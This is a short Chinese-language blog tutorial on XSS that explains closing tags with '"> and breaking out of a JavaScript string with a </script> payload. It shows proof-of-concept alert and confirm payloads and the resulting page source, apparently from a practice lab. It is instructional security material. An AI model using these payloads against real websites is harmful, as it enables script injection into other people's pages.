Web渗透测试之XSS跨站脚本之JS输出 以及 什么是闭合标签 一篇文章给你说明白

目录

闭合标签

XSS之js输出


闭合标签

  • 封闭标签 达到 让标签值不当成 一个属性值来展示 从而达到xss注入的效果

XML 复制代码
'"> 为了想办法闭合前面的标签,不用也行成功率高一些
攻击方法 '"><script>confirm(1)</script>,
  • 其中 '"> 我们称之为完成闭合符号,后面跟script标签来进行攻击,弹出了窗口表示我们的js代码被执行了。

  • 触发JS代码 生成XSS攻击


XSS之js输出

这个方式还是需要采用闭合的方式来进行使用 引号 闭合</script>

XML 复制代码
'</script><script>alert('this is my order')</script>>
复制代码
也就是在页面上输出 输出到js代码页面中去了 在js代码中执行
  • 查看页面源代码在查看js代码执行
  • 把前面的闭合 后面构造自己的js
XML 复制代码
<script>
    $ms=''</script><script>alert('this is my order')</script>>';
    if($ms.length != 0){
        if($ms == 'tmac'){
            $('#fromjs').text('tmac确实厉害,看那小眼神..')
        }else {
//            alert($ms);
            $('#fromjs').text('无论如何不要放弃心中所爱..')
        }

    }

相关推荐
一拳一个娘娘腔20 分钟前
第八期:实战演练 —— 构建一个完整的攻击链(模拟)
安全
星幻元宇VR23 分钟前
公共安全实训展厅设备【人防知识学习系统】
科技·学习·安全
喝拿铁写前端32 分钟前
AI 时代,ESLint 应该怎么做得更好
前端·人工智能·代码规范
想你依然心痛37 分钟前
嵌入式Linux安全加固:SELinux、Capabilities与Seccomp——强制访问控制与沙箱
linux·运维·安全
YIAN1 小时前
LangChain JS 工具调用实战:基于 DeepSeek-V4-Flash 实现本地文件读取 AI 代码助手(完整可运行源码)
javascript·langchain·前端框架
妙码生花1 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(二十七):管理员登录验证码开关
前端·后端·ai编程
尼斯湖皮皮怪1 小时前
iceCoder 记忆系统深度分析
前端·javascript
用户25577655743001 小时前
Cloudflare Pages 部署 Vite 项目踩坑记
前端
谢尔登1 小时前
通过Semi Design思考前端组件AI化
前端·人工智能
小蚂蚁i1 小时前
把 TypeScript 内置工具类型彻底搞懂,顺便自己封几个好用的
前端·typescript